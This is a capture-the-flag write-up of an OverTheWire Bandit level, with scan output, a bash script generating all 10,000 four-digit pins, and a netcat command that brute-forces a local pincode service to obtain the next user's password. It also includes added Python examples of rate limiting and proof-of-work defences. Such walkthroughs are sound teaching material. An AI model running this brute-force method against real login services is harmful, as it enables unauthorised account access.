Brute-Force Password Attacking

In this post, I would like to run through another one of OverTheWire's hacking challenges. To preserve the integrity of the challenges, all passwords in this post have been falsified.

In this level we have SSH access to a remote server, but our user has no permission to access the rest of the system.

We will start by using Nmap, the 'Network Mapper'. Nmap is an open-source tool for network security auditing. You can run man nmap to see the full set of options available with the tool, but for now we will do a full port scan of our localhost:

bandit24@bandit:~$ nmap -p- localhost

Starting Nmap 7.01 ( https://nmap.org ) at 2018-02-21 09:48 CET
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00014s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 65523 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
113/tcp   open  ident
12345/tcp open  netbus
30002/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 2.96 seconds

So here we can see an unknown service listening on port 30002. Using Netcat to establish a TCP connection with this port gives us the following prompt:

bandit24@bandit:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.

A hacker's dream, how convenient! Mind you, this is very much an entry-level challenge.

So the service listening on port 30002 is able to provide us with the SSH password for a more privileged user; however, it requires authentication with both our current password and a 4-digit pin. While we do have the password to hand, we do not have such a pin.

Let us see if we can spot any flaws in this service:

UoMY6gzctqAwOmw1TrfrBFHyQXmgIohZ 1234
Wrong! Please enter the correct pincode. Try again.
UoMY6gzctqAwOmw1TrfrBFHyQXmgIohZ 4321
Wrong! Please enter the correct pincode. Try again.

Now that we have tested the functionality of this service, one vulnerability can be spotted immediately: there is zero wait time between attempts, and there is no maximum number of attempts either! This service is happy to accept an unlimited number of pin variations until the correct pin is found, which is an easily exploitable vulnerability through a simple brute-force attack.


Off-Topic Digression

As a side-note, brute-forceable authentication is one of the first things a hacker will check, and there are many methods of securing this.

An easy fix is to implement a maximum number of guesses paired with a time-delay function, where each failed attempt incurs a cool-down period before the next input can be accepted. Apple, for example, utilise an incrementing cool-down counter between failed iPhone passcode attempts. Such a simple addition to the authentication model makes brute-forcing an iPhone passcode practically impossible. With a short 4-digit pin, this cool-down timer increases the time to brute-force an iPhone from mere seconds to 417 days. With more complex, alphanumeric passcodes, this time increases exponentially.
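To show what the fix described above looks like in practice, here is an added example (not code from the original post) of a pincode checker that keeps a per-client failed-attempt counter and applies an escalating cool-down, which is exactly what the service on port 30002 lacks. The cool-down schedule, the PinChecker name and the FakeClock helper are assumptions made for the example; the schedule is constructed and only loosely modelled on the iPhone behaviour mentioned above.

```python
import hmac
import time

# Cool-down in seconds applied after the Nth consecutive failure (1-based);
# the last value repeats for every further failure. Constructed schedule:
# five free attempts, then 1 min, 5 min, 15 min, then 1 hour each.
COOLDOWN_SCHEDULE = [0, 0, 0, 0, 0, 60, 300, 900, 3600]


def cooldown_for(failures: int) -> int:
    """Seconds a client must wait after its `failures`-th consecutive failure."""
    if failures <= 0:
        return 0
    return COOLDOWN_SCHEDULE[min(failures, len(COOLDOWN_SCHEDULE)) - 1]


class PinChecker:
    """Checks a pin and enforces the per-client cool-down policy above."""

    def __init__(self, secret_pin: str, clock=time.monotonic):
        self._secret = secret_pin
        self._clock = clock            # injected so tests need not sleep
        self._failures = {}            # client id -> consecutive failures
        self._locked_until = {}        # client id -> monotonic deadline

    def check(self, client: str, pin: str) -> str:
        now = self._clock()
        if now < self._locked_until.get(client, 0.0):
            return "cooling_down"      # guess is not even evaluated
        if hmac.compare_digest(pin, self._secret):   # constant-time compare
            self._failures.pop(client, None)
            self._locked_until.pop(client, None)
            return "correct"
        n = self._failures.get(client, 0) + 1
        self._failures[client] = n
        self._locked_until[client] = now + cooldown_for(n)
        return "wrong"


class FakeClock:
    """Controllable clock for demonstrations: call it, or advance() it."""
    def __init__(self):
        self.now = 0.0
    def __call__(self):
        return self.now
    def advance(self, seconds):
        self.now += seconds


def worst_case_seconds(pin_space: int = 10_000) -> float:
    """Time to try every pin if the attacker waits out each cool-down."""
    return float(sum(cooldown_for(n) for n in range(1, pin_space + 1)))
```

With this schedule, exhausting all 10,000 four-digit pins takes roughly 416 days instead of seconds, which is the effect the digression describes.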

Hashcash's Proof-of-Work algorithm takes a very different approach to this issue. Invented as a means of combating email spam and forum spam, Hashcash requires the client to perform computational "work" in the form of calculating a number of SHA256 hashes. The client is provided with a random number, and is tasked with running the SHA256 hash on this number until an output is found that has 20 leading zeros. The client has no way of reverse-engineering an ideal output, and is forced to perform the thousands of calculations. Once a satisfactory output has been found, the input and its hash are sent to the server for authentication, and the client is permitted to send their email, or make their forum post. This Proof-of-Work technology is used in Bitcoin to secure the race to mine each new block.
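As an added example (not from the original post or the Hashcash project itself), here is a minimal Hashcash-style proof-of-work round in Python using SHA-256, as the paragraph describes: the server issues a random challenge, the client searches for a counter whose hash has enough leading zero bits, and the server verifies with a single hash. The function names are assumptions; the difficulty is a parameter because 20 bits costs about a million hashes on average, so the demonstration runs at a smaller value.

```python
import hashlib
import os


def leading_zero_bits(digest: bytes) -> int:
    """Number of leading zero bits in a digest (e.g. 256 for all-zero SHA-256)."""
    return len(digest) * 8 - int.from_bytes(digest, "big").bit_length()


def issue_challenge() -> bytes:
    """Server side: a fresh random value the client must do its work on."""
    return os.urandom(16)


def stamp_hash(challenge: bytes, counter: int) -> bytes:
    """The quantity both sides hash: challenge || 8-byte big-endian counter."""
    return hashlib.sha256(challenge + counter.to_bytes(8, "big")).digest()


def mint(challenge: bytes, bits: int) -> int:
    """Client side: search counters until the hash has >= `bits` leading zero bits.

    There is no shortcut; on average this takes about 2**bits hashes.
    """
    counter = 0
    while leading_zero_bits(stamp_hash(challenge, counter)) < bits:
        counter += 1
    return counter


def verify(challenge: bytes, counter: int, bits: int) -> bool:
    """Server side: one hash confirms work that cost the client ~2**bits hashes."""
    return leading_zero_bits(stamp_hash(challenge, counter)) >= bits


def expected_hashes(bits: int) -> int:
    """Average number of hashes a client must compute for `bits` difficulty."""
    return 2 ** bits


def demo_round(bits: int = 12) -> bool:
    """One full exchange on a constructed challenge; True if the stamp verifies."""
    challenge = b"constructed-demo-challenge"   # constructed, not a real nonce
    counter = mint(challenge, bits)
    return verify(challenge, counter, bits)
```

Applied to a pincode checker, requiring a valid stamp with every guess makes each of the 10,000 attempts cost the client 2**bits hashes while the server keeps no per-client state at all.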


Anyway, back to the topic at hand. Our audit has presented us with an ideal attack vector, so now we just need to create our brute-force bash script:

bandit24@bandit:~$ mkdir /tmp/skyenet
bandit24@bandit:~$ cd /tmp/skyenet
bandit24@bandit:/tmp/skyenet$ touch bruteforce.sh
bandit24@bandit:/tmp/skyenet$ ls
bruteforce.sh

In this script, we will create a simple loop to generate every number between 0 and 9999, zero-padded to maintain the 4-digit length, and prefix our password to each line of output:

#!/bin/bash

# No spaces around '=': with spaces bash would try to run a command named "password"
password="UoMY6gzctqAwOmw1TrfrBFHyQXmgIohZ"
# Brace expansion with a zero-padded start keeps every value four digits wide
for i in {0000..9999}
do
  echo "$password $i"
done

Now we make the script executable and run it, redirecting the output into a brand new .txt file:

bandit24@bandit:/tmp/skyenet$ chmod +x bruteforce.sh
bandit24@bandit:/tmp/skyenet$ ./bruteforce.sh > pin_crack.txt
bandit24@bandit:/tmp/skyenet$ ls
bruteforce.sh  pin_crack.txt

We now have our output, and we can see that it is formatted correctly for our brute-force attack:

bandit24@bandit:/tmp/skyenet$ more pin_crack.txt
UoMY6gzctqAwOmw1TrfrBFHyQXmgIohZ 0001
UoMY6gzctqAwOmw1TrfrBFHyQXmgIohZ 0002
UoMY6gzctqAwOmw1TrfrBFHyQXmgIohZ 0003
UoMY6gzctqAwOmw1TrfrBFHyQXmgIohZ 0004
UoMY6gzctqAwOmw1TrfrBFHyQXmgIohZ 0005
...

All that is left now is to feed our 10,000 passcode attempts into the service on port 30002 until the correct one is found:

bandit24@bandit:/tmp/skyenet$ nc localhost 30002 < pin_crack.txt

...

Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Correct!
The password of user bandit25 is uNG9O58gvZ0rxhtnUE7snukf3bjzSGzG

Fantastic! Once the correct password combination was input into the service, we were provided with the password for user bandit25:

bandit24@bandit:~$ ssh bandit25@localhost
bandit25@localhost's password: uNG9O58gvZ0rxhtnUE7snukf3bjzSGzG
...
bandit25@bandit:~$

And a correct password at that!


This has been a quick look at an (admittedly staged) brute-force attack, and the simple tools involved.

Thank you for reading!

DISCLAIMER: Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors of SkyeNet.tech will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
